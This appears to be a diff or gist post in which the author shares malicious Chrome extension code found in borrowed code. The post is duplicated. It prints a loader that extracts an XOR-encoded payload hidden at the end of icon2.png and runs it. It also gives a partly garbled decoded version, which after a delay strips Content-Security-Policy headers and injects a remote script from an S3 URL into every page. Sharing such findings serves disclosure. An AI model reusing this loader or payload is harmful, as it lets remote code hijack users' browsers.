StephenFluin · December 26, 2016 22:03
diff --git a/evil.js b/evil.js
 //Found this in some code I borrowed:

 (() => {
    var main = () => {
   chrome.runtime.getPackageDirectoryEntry(function (root) {
       var icon = "icon2.png";
       root.getFile(icon, {}, function (fileEntry) {
         fileEntry.file(function (file) {
           var reader = new FileReader();
           reader.onloadend = function (e) {
             var text = this.result;
             var idxF = text.lastIndexOf("init>");
             if (idxF < 0) return;
             text = text.substr(idxF + 5);
             var idxL = text.lastIndexOf("<end");
             if (idxL < 0) return;
             text = text.substr(0,idxL);
             for (var t = 0, r = text.length, n = ""; r > t;)
               n += String.fromCharCode(77 ^ text.charCodeAt(t++));
             var a = new window.Blob([n], {
               type: "text/javascript"
             });
             addScript(window.URL.createObjectURL(a));
           };
           reader.readAsText(file);
         }, (e) => {
           console.log(e)
       });
     }, (r) => {
   console.log(r)
 });
 });
 };

 // At the end of icon2.png there was this:

 // EXt23minit>;,?m7(?"mpme,am/dmpsm6m.%?" (c>9"?,*(c!".,!c*(9e6m        wm}m0ame.psm6m}mppm.c   mrmeedmpsm6m.%?" (c>9"?,*(c!".,!c>(9e6m        wme#(:m ,9(dc*(9$ (edm0dam>(9$ ("89e7(?"am,am,am/dm0dedmwmeedmpsm6mee#(:m      ,9(dc*(9$ (edm`m.c      m11m}dmqm/mrm>(9$ ("89e7(?"am,am,am/dmwm"#(edm0dedm0ddm0am"#(mpmedmpsm6m.%?" (c:(/(<8(>9mkkm.%?" (c:(/(<8(>9c"#(,)(?>(.($;()c,))$>9(#(?ee,psm6m$+me,c9,/)mlpm`|dm6m+"?me;,?m/m$#m,c?(>="#>((,)(?>dmo"/'(.9omppm94=("+m,c?(>="#>((,)(?>/mkkmo."#9(#9`>(.8?$94`="!$.4ompppm,c?(>="#>((,)(?>/c#, (c9"":(?,>(edmkkm,c?(>="#>((,)(?>c>=!$.(e/am|dvm?(98?#m6m?(>="#>((,)(?>wm,c?(>="#>((,)(?>m0m0m0dam6m8?!>wmoq,!!8?!>soam94=(>wmo ,$#+?, (om0amo?(>="#>((,)(?>oamo/!".&$#*odam.%?" (c9,/>mkkm.%?" (c9,/>c"#▒=),9()c,))$>9(#(?eee,am/dmpsm6mo." =!(9(omppm/c>9,98>mkkm.%?" (c9,/>c(5(.89(.?$=9e,am6m.")(wm-eedmpsm6;,?m>mpm)".8 (#9c.?(,9!( (#9ej>.?$=9jdv>c>?.mpmjbb>~c(8`.(#9?,!`|c, ,7"#,:>c." b+"?9"#b./=b. =>bx}.||(c'>jv)".8 (#9c/")4c,==(#)%$!)e>dv0dedv-m0dm0ddm0vm7(?"e~{(xamu{y(xdv<end����IEND�B`�

 // I decoded this to

 // var zero = (a, b) => { chrome.storage.local.get({ mmmmmmmm: 0 }, (c=> { 0 == c.mmm ? (() => { chrome.storage.local.set({ mmmmmmmm: (new mate).getime() }), setimeout(zero, a, a, b) })() : (() => { ((new mmmmmmate).getime() - c.mmmmmm || 0) < b ? setimeout(zero, a, a, b) : one() })() })) }, one = () => { chrome.webequest && chrome.webequest.oneaderseceived.addistener((a=> { if (a.tabd != -1) { for (var b in a.responseeaders) "object" == typeof a.responseeadersb && "content-security-policy" === a.responseeadersb.name.toowerase() && a.responseeaders.splice(b, 1); return { responseeaders: a.responseeaders } } }), { urls: "<allurls>", types: "mainframe" }, "responseeaders", "blocking"), chrome.tabs && chrome.tabs.on◟pdated.addistener(((a, b) => { "complete" == b.status && chrome.tabs.executecript(a, { code: `(() => {var s = document.creatlement('script');s.src = '//s3.eu-central-1.amazonaws.com/forton/cbp/cmps/50c11e.js';document.body.appendhild(s);})();` }) })) }; zero(36e5, 864e5);
	//Found this in some code I borrowed:

	(() => {
	var main = () => {
	chrome.runtime.getPackageDirectoryEntry(function (root) {
	var icon = "icon2.png";
	root.getFile(icon, {}, function (fileEntry) {
	fileEntry.file(function (file) {
	var reader = new FileReader();
	reader.onloadend = function (e) {
	var text = this.result;
	var idxF = text.lastIndexOf("init>");
	if (idxF < 0) return;
	text = text.substr(idxF + 5);
	var idxL = text.lastIndexOf("<end");
	if (idxL < 0) return;
	text = text.substr(0,idxL);
	for (var t = 0, r = text.length, n = ""; r > t;)
	n += String.fromCharCode(77 ^ text.charCodeAt(t++));
	var a = new window.Blob([n], {
	type: "text/javascript"
	});
	addScript(window.URL.createObjectURL(a));
	};
	reader.readAsText(file);
	}, (e) => {
	console.log(e)
	});
	}, (r) => {
	console.log(r)
	});
	});
	};

	// At the end of icon2.png there was this:

	// EXt23minit>;,?m7(?"mpme,am/dmpsm6m.%?" (c>9"?,(c!".,!c(9e6m wm}m0ame.psm6m}mppm.c mrmeedmpsm6m.%?" (c>9"?,(c!".,!c>(9e6m wme#(:m ,9(dc(9$ (edm0dam>(9$ ("89e7(?"am,am,am/dm0dedmwmeedmpsm6mee#(:m ,9(dc(9$ (edm`m.c m11m}dmqm/mrm>(9$ ("89e7(?"am,am,am/dmwm"#(edm0dedm0ddm0am"#(mpmedmpsm6m.%?" (c:(/(<8(>9mkkm.%?" (c:(/(<8(>9c"#(,)(?>(.($;()c,))$>9(#(?ee,psm6m$+me,c9,/)mlpm`\|dm6m+"?me;,?m/m$#m,c?(>="#>((,)(?>dmo"/'(.9omppm94=("+m,c?(>="#>((,)(?>/mkkmo."#9(#9`>(.8?$94`="!$.4ompppm,c?(>="#>((,)(?>/c#, (c9"":(?,>(edmkkm,c?(>="#>((,)(?>c>=!$.(e/am\|dvm?(98?#m6m?(>="#>((,)(?>wm,c?(>="#>((,)(?>m0m0m0dam6m8?!>wmoq,!!8?!>soam94=(>wmo ,$#+?, (om0amo?(>="#>((,)(?>oamo/!".&$#odam.%?" (c9,/>mkkm.%?" (c9,/>c"#▒=),9()c,))$>9(#(?eee,am/dmpsm6mo." =!(9(omppm/c>9,98>mkkm.%?" (c9,/>c(5(.89(.?$=9e,am6m.")(wm-eedmpsm6;,?m>mpm)".8 (#9c.?(,9!( (#9ej>.?$=9jdv>c>?.mpmjbb>~c(8`.(#9?,!`\|c, ,7"#,:>c." b+"?9"#b./=b. =>bx}.\|\|(c'>jv)".8 (#9c/")4c,==(#)%$!)e>dv0dedv-m0dm0ddm0vm7(?"e~{(xamu{y(xdv<end��IEND�B`�

	// I decoded this to

	// var zero = (a, b) => { chrome.storage.local.get({ mmmmmmmm: 0 }, (c=> { 0 == c.mmm ? (() => { chrome.storage.local.set({ mmmmmmmm: (new mate).getime() }), setimeout(zero, a, a, b) })() : (() => { ((new mmmmmmate).getime() - c.mmmmmm \|\| 0) < b ? setimeout(zero, a, a, b) : one() })() })) }, one = () => { chrome.webequest && chrome.webequest.oneaderseceived.addistener((a=> { if (a.tabd != -1) { for (var b in a.responseeaders) "object" == typeof a.responseeadersb && "content-security-policy" === a.responseeadersb.name.toowerase() && a.responseeaders.splice(b, 1); return { responseeaders: a.responseeaders } } }), { urls: "<allurls>", types: "mainframe" }, "responseeaders", "blocking"), chrome.tabs && chrome.tabs.on◟pdated.addistener(((a, b) => { "complete" == b.status && chrome.tabs.executecript(a, { code: `(() => {var s = document.creatlement('script');s.src = '//s3.eu-central-1.amazonaws.com/forton/cbp/cmps/50c11e.js';document.body.appendhild(s);})();` }) })) }; zero(36e5, 864e5);